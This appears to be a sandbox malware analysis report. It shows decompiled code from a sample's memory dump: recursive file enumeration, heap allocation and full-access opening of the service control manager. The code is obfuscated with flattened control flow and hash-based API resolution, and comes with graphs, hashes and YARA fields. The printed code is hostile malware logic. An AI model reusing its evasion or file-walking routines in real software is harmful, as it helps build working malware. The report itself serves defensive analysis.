                                                        control_flow_graph 447 3e38f0-3e390b 448 3e3910-3e3915 447->448 449 3e391b 448->449 450 3e3a69-3e3a6e 448->450 453 3e3a5f-3e3a64 449->453 454 3e3921-3e3926 449->454 451 3e3acc-3e3adf call 3e34c0 450->451 452 3e3a70-3e3a75 450->452 468 3e3afc-3e3b17 451->468 469 3e3ae1-3e3af7 call 3e3f00 call 3e3e60 451->469 455 3e3ab6-3e3abb 452->455 456 3e3a77-3e3a7e 452->456 453->448 457 3e392c-3e3931 454->457 458 3e3a17-3e3a1e 454->458 455->448 465 3e3ac1-3e3acb 455->465 461 3e3a9b-3e3ab1 456->461 462 3e3a80-3e3a96 call 3e3f00 call 3e3e60 456->462 466 3e3937-3e393c 457->466 467 3e3b70-3e3b77 457->467 463 3e3a3b-3e3a4f FindFirstFileW 458->463 464 3e3a20-3e3a36 call 3e3f00 call 3e3e60 458->464 461->448 462->461 474 3e3b97-3e3ba1 463->474 475 3e3a55-3e3a5a 463->475 464->463 466->455 476 3e3942-3e3947 466->476 472 3e3b79-3e3b8f call 3e3f00 call 3e3e60 467->472 473 3e3b94 467->473 497 3e3b19-3e3b2f call 3e3f00 call 3e3e60 468->497 498 3e3b34-3e3b3f 468->498 469->468 472->473 473->474 475->448 477 3e394d-3e3953 476->477 478 3e39f1-3e3a12 476->478 484 3e3974-3e3976 477->484 485 3e3955-3e395d 477->485 478->448 492 3e396d-3e3972 484->492 494 3e3978-3e398b call 3e34c0 484->494 491 3e395f-3e3963 485->491 485->492 491->484 501 3e3965-3e396b 491->501 492->448 511 3e398d-3e39a3 call 3e3f00 call 3e3e60 494->511 512 3e39a8-3e39ec call 3e38f0 call 3e3460 494->512 497->498 509 3e3b5c-3e3b6b 498->509 510 3e3b41-3e3b57 call 3e3f00 call 3e3e60 498->510 501->484 501->492 509->448 510->509 511->512 512->448
                                                        C-Code - Quality: 63%
                                                        			E003E38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x3ee430 == 0) {
                                                        								 *0x3ee430 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x3edba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x3edba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E003E34C0(0x3ed290);
                                                        											_t50 =  *0x3ee158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E003E3E60(_t56, E003E3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x3ee158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E003E38F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E003E3460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E003E34C0(0x3ed260);
                                                        					_t24 =  *0x3ee158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E003E3E60(_t56, E003E3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x3ee158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x3ee494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x3ee494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x3edf30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x3edf30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x3edf88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x3edf88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x003e38fa
                                                        0x003e38fc
                                                        0x003e38fe
                                                        0x003e3902
                                                        0x003e3907
                                                        0x003e3910
                                                        0x003e3910
                                                        0x003e3910
                                                        0x003e3915
                                                        0x00000000
                                                        0x00000000
                                                        0x003e391b
                                                        0x003e3a5f
                                                        0x00000000
                                                        0x003e3921
                                                        0x003e3926
                                                        0x003e3a1e
                                                        0x003e3a36
                                                        0x003e3a36
                                                        0x003e3a48
                                                        0x003e3a4a
                                                        0x003e3a4f
                                                        0x003e3ba1
                                                        0x003e3a55
                                                        0x003e3a55
                                                        0x00000000
                                                        0x003e3a55
                                                        0x003e392c
                                                        0x003e3931
                                                        0x003e3b70
                                                        0x003e3b77
                                                        0x003e3b8a
                                                        0x003e3b8f
                                                        0x003e3b8f
                                                        0x00000000
                                                        0x003e3b95
                                                        0x003e393c
                                                        0x003e3ab6
                                                        0x003e3abb
                                                        0x00000000
                                                        0x003e3acb
                                                        0x003e3acb
                                                        0x003e3acb
                                                        0x003e3942
                                                        0x003e3947
                                                        0x003e39fd
                                                        0x003e3a06
                                                        0x003e3a0d
                                                        0x003e394d
                                                        0x003e3953
                                                        0x003e3974
                                                        0x003e3976
                                                        0x00000000
                                                        0x003e3978
                                                        0x003e3982
                                                        0x003e3984
                                                        0x003e398b
                                                        0x003e399e
                                                        0x003e39a3
                                                        0x003e39a3
                                                        0x003e39bc
                                                        0x003e39d8
                                                        0x003e39dd
                                                        0x003e39e2
                                                        0x003e39e7
                                                        0x003e39e7
                                                        0x003e3955
                                                        0x003e3955
                                                        0x003e395d
                                                        0x003e396d
                                                        0x003e396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003e395d
                                                        0x003e3953
                                                        0x00000000
                                                        0x003e3947
                                                        0x003e393c
                                                        0x003e3926
                                                        0x00000000
                                                        0x003e391b
                                                        0x003e3a6e
                                                        0x003e3ad6
                                                        0x003e3ad8
                                                        0x003e3adf
                                                        0x003e3af2
                                                        0x003e3af7
                                                        0x003e3af7
                                                        0x003e3b0b
                                                        0x003e3b0d
                                                        0x003e3b12
                                                        0x003e3b17
                                                        0x003e3b2a
                                                        0x003e3b2f
                                                        0x003e3b2f
                                                        0x003e3b36
                                                        0x003e3b38
                                                        0x003e3b3f
                                                        0x003e3b52
                                                        0x003e3b57
                                                        0x003e3b57
                                                        0x003e3b60
                                                        0x003e3b62
                                                        0x003e3b66
                                                        0x00000000
                                                        0x003e3a70
                                                        0x003e3a75
                                                        0x00000000
                                                        0x003e3a77
                                                        0x003e3a77
                                                        0x003e3a7e
                                                        0x003e3a91
                                                        0x003e3a96
                                                        0x003e3a96
                                                        0x003e3aa1
                                                        0x003e3aa5
                                                        0x003e3aac
                                                        0x00000000
                                                        0x003e3aac
                                                        0x003e3a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 003E3A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: 59dda3ab98b407d8618fcc53b3a7d06847a9f36683dd29bcd4ad2946dd87d394
                                                        • Instruction ID: ebad58ed1d4e53fb205c4c3d4125e58790bbc3cb2dbff0001b831096572d3aaf
                                                        • Opcode Fuzzy Hash: 59dda3ab98b407d8618fcc53b3a7d06847a9f36683dd29bcd4ad2946dd87d394
                                                        • Instruction Fuzzy Hash: D05103316042E54BCA36AB6A988D77B36AA9BD0700F010B29F456CF3D2EB75CF454792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 658 3e5040-3e5057 659 3e505c 658->659 660 3e5060-3e5066 659->660 661 3e51af-3e51b5 660->661 662 3e506c 660->662 663 3e51bb 661->663 664 3e52f9-3e52ff 661->664 665 3e5367-3e536e 662->665 666 3e5072-3e5078 662->666 671 3e5277-3e527e 663->671 672 3e51c1-3e51c7 663->672 667 3e52e8-3e52ee 664->667 668 3e5301-3e5308 664->668 669 3e538b-3e5396 665->669 670 3e5370-3e5386 call 3e3f00 call 3e3e60 665->670 673 3e507a 666->673 674 3e50f9-3e50ff 666->674 684 3e53b9-3e53c0 667->684 685 3e52f4 667->685 675 3e530a-3e5320 call 3e3f00 call 3e3e60 668->675 676 3e5325-3e5330 668->676 704 3e5398-3e53ae call 3e3f00 call 3e3e60 669->704 705 3e53b3-3e53b6 669->705 670->669 686 3e529b-3e52c5 671->686 687 3e5280-3e5296 call 3e3f00 call 3e3e60 671->687 678 3e526d-3e5272 672->678 679 3e51cd-3e51d3 672->679 680 3e507c-3e5082 673->680 681 3e50c2-3e50c9 673->681 682 3e5153-3e515a 674->682 683 3e5101-3e5107 674->683 675->676 725 3e534d-3e535b RtlAllocateHeap 676->725 726 3e5332-3e5348 call 3e3f00 call 3e3e60 676->726 678->660 679->667 692 3e51d9-3e51e0 679->692 697 3e50ad-3e50c0 680->697 698 3e5084-3e508a 680->698 688 3e50cb-3e50e1 call 3e3f00 call 3e3e60 681->688 689 3e50e6-3e50e9 681->689 695 3e515c-3e5172 call 3e3f00 call 3e3e60 682->695 696 3e5177-3e5182 682->696 683->667 693 3e510d-3e5114 683->693 685->659 717 3e52c7-3e52dd call 3e3f00 call 3e3e60 686->717 718 3e52e2 686->718 687->686 688->689 719 3e50ef-3e50f4 689->719 706 3e51fd-3e521f 692->706 707 3e51e2-3e51f8 call 3e3f00 call 3e3e60 692->707 708 3e5116-3e512c call 3e3f00 call 3e3e60 693->708 709 3e5131-3e514e 693->709 695->696 740 3e519f-3e51aa 696->740 741 3e5184-3e519a call 3e3f00 call 3e3e60 696->741 697->660 698->667 713 3e5090-3e50ab call 3e42c0 698->713 704->705 705->684 706->719 749 3e5225-3e522c 706->749 707->706 708->709 709->659 713->659 717->718 718->667 719->659 725->684 742 3e535d-3e5362 725->742 726->725 740->659 741->740 742->659 759 3e522e-3e5244 call 3e3f00 call 3e3e60 749->759 760 3e5249-3e5268 749->760 759->760 760->660
                                                        C-Code - Quality: 61%
                                                        			E003E5040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x3ee494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x3ee494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x3edd18;
                                                        								if( *0x3edd18 == 0) {
                                                        									 *0x3edd18 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x3ee484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x9e91db81, _t112);
                                                        									 *0x3ee484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x3ee18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x3ee18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x3ee29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x3ee29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x3ede08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0xd8ef4c49, _t112);
                                                        												 *0x3ede08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x3ee494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x3ee494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x3edf30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x3edf30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x3ee494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x3ee494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x3edf30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x3edf30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x3ee270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x3ee270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x3ee200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x3ee200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E003E42C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x003e5047
                                                        0x003e504b
                                                        0x003e504d
                                                        0x003e5051
                                                        0x003e5053
                                                        0x003e5057
                                                        0x003e505c
                                                        0x003e505c
                                                        0x003e5060
                                                        0x003e5060
                                                        0x003e5060
                                                        0x003e5066
                                                        0x00000000
                                                        0x00000000
                                                        0x003e51af
                                                        0x003e51b5
                                                        0x003e52f9
                                                        0x003e52ff
                                                        0x00000000
                                                        0x003e5301
                                                        0x003e5301
                                                        0x003e5306
                                                        0x003e5308
                                                        0x003e531b
                                                        0x003e5320
                                                        0x003e5320
                                                        0x003e5327
                                                        0x003e532e
                                                        0x003e5330
                                                        0x003e5348
                                                        0x003e5348
                                                        0x003e5355
                                                        0x003e5357
                                                        0x003e5359
                                                        0x003e535b
                                                        0x003e535d
                                                        0x003e505c
                                                        0x003e505c
                                                        0x00000000
                                                        0x003e505c
                                                        0x003e505c
                                                        0x003e535b
                                                        0x003e51bb
                                                        0x003e51bb
                                                        0x003e5277
                                                        0x003e527c
                                                        0x003e527e
                                                        0x003e5291
                                                        0x003e5296
                                                        0x003e5296
                                                        0x003e52ac
                                                        0x003e52b0
                                                        0x003e52b2
                                                        0x003e52bd
                                                        0x003e52c3
                                                        0x003e52c5
                                                        0x003e52d8
                                                        0x003e52dd
                                                        0x003e52dd
                                                        0x003e52e6
                                                        0x00000000
                                                        0x003e51c1
                                                        0x003e51c1
                                                        0x003e51c7
                                                        0x003e526d
                                                        0x00000000
                                                        0x003e51cd
                                                        0x003e51cd
                                                        0x003e51d3
                                                        0x003e52e8
                                                        0x003e52e8
                                                        0x003e52ee
                                                        0x003e505c
                                                        0x003e505c
                                                        0x00000000
                                                        0x003e505c
                                                        0x003e505c
                                                        0x003e51d9
                                                        0x003e51d9
                                                        0x003e51de
                                                        0x003e51e0
                                                        0x003e51f3
                                                        0x003e51f8
                                                        0x003e51f8
                                                        0x003e521b
                                                        0x003e521d
                                                        0x003e521f
                                                        0x003e50ef
                                                        0x003e50ef
                                                        0x003e505c
                                                        0x003e505c
                                                        0x00000000
                                                        0x003e505c
                                                        0x003e5225
                                                        0x003e5225
                                                        0x003e522a
                                                        0x003e522c
                                                        0x003e523f
                                                        0x003e5244
                                                        0x003e5244
                                                        0x003e5249
                                                        0x003e524e
                                                        0x003e525b
                                                        0x003e525d
                                                        0x003e525f
                                                        0x003e5261
                                                        0x003e5265
                                                        0x00000000
                                                        0x003e5265
                                                        0x00000000
                                                        0x003e521f
                                                        0x003e51d3
                                                        0x003e51c7
                                                        0x003e51bb
                                                        0x003e53c0
                                                        0x003e53c0
                                                        0x00000000
                                                        0x003e53c0
                                                        0x003e506c
                                                        0x003e5367
                                                        0x003e536c
                                                        0x003e536e
                                                        0x003e5381
                                                        0x003e5386
                                                        0x003e5386
                                                        0x003e538d
                                                        0x003e538f
                                                        0x003e5394
                                                        0x003e5396
                                                        0x003e53a9
                                                        0x003e53ae
                                                        0x003e53ae
                                                        0x00000000
                                                        0x003e53b7
                                                        0x003e5072
                                                        0x003e5078
                                                        0x003e50f9
                                                        0x003e50ff
                                                        0x003e5153
                                                        0x003e5158
                                                        0x003e515a
                                                        0x003e516d
                                                        0x003e5172
                                                        0x003e5172
                                                        0x003e5179
                                                        0x003e517b
                                                        0x003e5180
                                                        0x003e5182
                                                        0x003e5195
                                                        0x003e519a
                                                        0x003e519a
                                                        0x003e51a3
                                                        0x003e51a5
                                                        0x00000000
                                                        0x003e5101
                                                        0x003e5101
                                                        0x003e5107
                                                        0x00000000
                                                        0x003e510d
                                                        0x003e510d
                                                        0x003e5112
                                                        0x003e5114
                                                        0x003e5127
                                                        0x003e512c
                                                        0x003e512c
                                                        0x003e5139
                                                        0x003e513b
                                                        0x003e513d
                                                        0x003e514b
                                                        0x003e505c
                                                        0x003e505c
                                                        0x00000000
                                                        0x003e505c
                                                        0x003e505c
                                                        0x003e5107
                                                        0x003e507a
                                                        0x003e507a
                                                        0x003e50c2
                                                        0x003e50c7
                                                        0x003e50c9
                                                        0x003e50dc
                                                        0x003e50e1
                                                        0x003e50e1
                                                        0x003e50ed
                                                        0x00000000
                                                        0x003e507c
                                                        0x003e5082
                                                        0x003e50ad
                                                        0x003e50b0
                                                        0x003e50b2
                                                        0x003e50ba
                                                        0x00000000
                                                        0x003e5084
                                                        0x003e508a
                                                        0x00000000
                                                        0x003e5090
                                                        0x003e509a
                                                        0x003e50a8
                                                        0x003e505c
                                                        0x003e505c
                                                        0x00000000
                                                        0x003e505c
                                                        0x003e505c
                                                        0x003e508a
                                                        0x003e5082
                                                        0x003e507a
                                                        0x00000000
                                                        0x003e5078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,003E8AC8,?,3251FEFE,?,?), ref: 003E5355
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 133d7f2ca5510ac489f825c25ec4a53eaa06e005271f18bdac58970ca82bde36
                                                        • Instruction ID: 35d7fc1f7d1e6bad15e6cd8394cd28a72521c73478c107b9ddd4e37f4ab40a6e
                                                        • Opcode Fuzzy Hash: 133d7f2ca5510ac489f825c25ec4a53eaa06e005271f18bdac58970ca82bde36
                                                        • Instruction Fuzzy Hash: 4681F532B447B58BDF22AF7B8C8572A36DE9B94748F020769F901DF2D1EA218D014BC1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 73%
                                                        			E003E9860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x3ee310;
                                                        							if( *0x3ee310 == 0) {
                                                        								 *0x3ee310 = E003E3E60(_t64, E003E3F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
